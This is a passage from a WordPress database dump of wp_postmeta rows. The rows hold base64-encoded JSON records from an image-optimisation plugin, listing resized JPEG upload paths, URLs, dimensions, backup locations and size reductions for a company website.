3cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTJcL1NraW4tRGVncmVhc2VyLUgtMTExMkItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY1NTUsImlkIjozMzY2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL1NraW4tRGVncmVhc2VyLUgtMTExMkItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9Ta2luLURlZ3JlYXNlci1ILTExMTJCLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvU2tpbi1EZWdyZWFzZXItSC0xMTEyQi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NjU1NywiaWQiOjMzNjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvU2tpbi1EZWdyZWFzZXItSC0xMTEyQi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL1NraW4tRGVncmVhc2VyLUgtMTExMkItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEyXC9Ta2luLURlZ3JlYXNlci1ILTExMTJCLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2NTYxLCJpZCI6MzM2Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9Ta2luLURlZ3JlYXNlci1ILTExMTJCLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvU2tpbi1EZWdyZWFzZXItSC0xMTEyQi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTJcL1NraW4tRGVncmVhc2VyLUgtMTExMkItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY1NjUsImlkIjozMzY2fV0='); 
INSERT INTO `wp_postmeta` VALUES (28696, 3365, 'wpfc_optimisation_reduction', '524594'); 
INSERT INTO `wp_postmeta` VALUES (28697, 3365, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzI4MDg1NTUxMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL3NodXR0ZXJzdG9ja18yODA4NTU1MTEuanBnIiwid2lkdGgiOjEwMDAsImhlaWdodCI6NjY3LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzI4MDg1NTUxMS5qcGciLCJyZWR1Y3Rpb24iOjUyNDU4NywidGltZSI6MTQ4MzU0NjU0OSwiaWQiOiIzMzY1In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9zaHV0dGVyc3RvY2tfMjgwODU1NTExLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzI4MDg1NTUxMS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTJcL3NodXR0ZXJzdG9ja18yODA4NTU1MTEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY1NTMsImlkIjozMzY1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL3NodXR0ZXJzdG9ja18yODA4NTU1MTEtODAweDUzNC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9zaHV0dGVyc3RvY2tfMjgwODU1NTExLTgwMHg1MzQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzI4MDg1NTUxMS04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NjU1NiwiaWQiOjMzNjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzI4MDg1NTUxMS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL3NodXR0ZXJzdG9ja18yODA4NTU1MTEtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEyXC9zaHV0dGVyc3RvY2tfMjgwODU1NTExLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2NTU5LCJpZCI6MzM2NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9zaHV0dGVyc3RvY2tfMjgwODU1NTExLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzI4MDg1NTUxMS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTJcL3NodXR0ZXJzdG9ja18yODA4NTU1MTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY1NjEsImlkIjozMzY1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL3NodXR0ZXJzdG9ja18yODA4NTU1MTEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9zaHV0dGVyc3RvY2tfMjgwODU1NTExLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzI4MDg1NTUxMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NjU2MywiaWQiOjMzNjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzI4MDg1NTUxMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL3NodXR0ZXJzdG9ja18yODA4NTU1MTEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEyXC9zaHV0dGVyc3RvY2tfMjgwODU1NTExLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2NTY2LCJpZCI6MzM2NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9zaHV0dGVyc3RvY2tfMjgwODU1NTExLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzI4MDg1NTUxMS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTJcL3NodXR0ZXJzdG9ja18yODA4NTU1MTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY1NjksImlkIjozMzY1fV0='); 
INSERT INTO `wp_postmeta` VALUES (28698, 3359, 'wpfc_optimisation_reduction', '492711'); 
INSERT INTO `wp_postmeta` VALUES (28699, 3359, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzU0Mzc5NDMyMy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL3NodXR0ZXJzdG9ja181NDM3OTQzMjMuanBnIiwid2lkdGgiOjEwMDAsImhlaWdodCI6NjY3LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzU0Mzc5NDMyMy5qcGciLCJyZWR1Y3Rpb24iOjQ5MjcwNCwidGltZSI6MTQ4MzU0NjU3OCwiaWQiOiIzMzU5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9zaHV0dGVyc3RvY2tfNTQzNzk0MzIzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzU0Mzc5NDMyMy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTJcL3NodXR0ZXJzdG9ja181NDM3OTQzMjMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY1ODEsImlkIjozMzU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL3NodXR0ZXJzdG9ja181NDM3OTQzMjMtODAweDUzNC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9zaHV0dGVyc3RvY2tfNTQzNzk0MzIzLTgwMHg1MzQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzU0Mzc5NDMyMy04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NjU4NCwiaWQiOjMzNTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzU0Mzc5NDMyMy03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL3NodXR0ZXJzdG9ja181NDM3OTQzMjMtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEyXC9zaHV0dGVyc3RvY2tfNTQzNzk0MzIzLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2NTg2LCJpZCI6MzM1OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9zaHV0dGVyc3RvY2tfNTQzNzk0MzIzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzU0Mzc5NDMyMy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTJcL3NodXR0ZXJzdG9ja181NDM3OTQzMjMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY1ODksImlkIjozMzU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL3NodXR0ZXJzdG9ja181NDM3OTQzMjMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9zaHV0dGVyc3RvY2tfNTQzNzk0MzIzLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzU0Mzc5NDMyMy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NjU5MSwiaWQiOjMzNTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzU0Mzc5NDMyMy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL3NodXR0ZXJzdG9ja181NDM3OTQzMjMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEyXC9zaHV0dGVyc3RvY2tfNTQzNzk0MzIzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2NTkzLCJpZCI6MzM1OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9zaHV0dGVyc3RvY2tfNTQzNzk0MzIzLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvc2h1dHRlcnN0b2NrXzU0Mzc5NDMyMy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTJcL3NodXR0ZXJzdG9ja181NDM3OTQzMjMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY1OTcsImlkIjozMzU5fV0='); 
INSERT INTO `wp_postmeta` VALUES (28700, 3282, 'wpfc_optimisation_reduction', '8'); 
INSERT INTO `wp_postmeta` VALUES (28701, 3282, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzUzNzAwODg5Ni5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja181MzcwMDg4OTYuanBnIiwid2lkdGgiOjEwMDAsImhlaWdodCI6NjY1LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzUzNzAwODg5Ni5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY2MTIsImlkIjoiMzI4MiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzUzNzAwODg5Ni0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja181MzcwMDg4OTYtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfNTM3MDA4ODk2LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2NjE1LCJpZCI6MzI4Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfNTM3MDA4ODk2LTgwMHg1MzIuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzUzNzAwODg5Ni04MDB4NTMyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja181MzcwMDg4OTYtODAweDUzMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY2MTgsImlkIjozMjgyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja181MzcwMDg4OTYtNzY4eDUxMS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfNTM3MDA4ODk2LTc2OHg1MTEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzUzNzAwODg5Ni03Njh4NTExLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NjYyMCwiaWQiOjMyODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzUzNzAwODg5Ni0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja181MzcwMDg4OTYtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfNTM3MDA4ODk2LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2NjIzLCJpZCI6MzI4Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfNTM3MDA4ODk2LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzUzNzAwODg5Ni0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja181MzcwMDg4OTYtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRp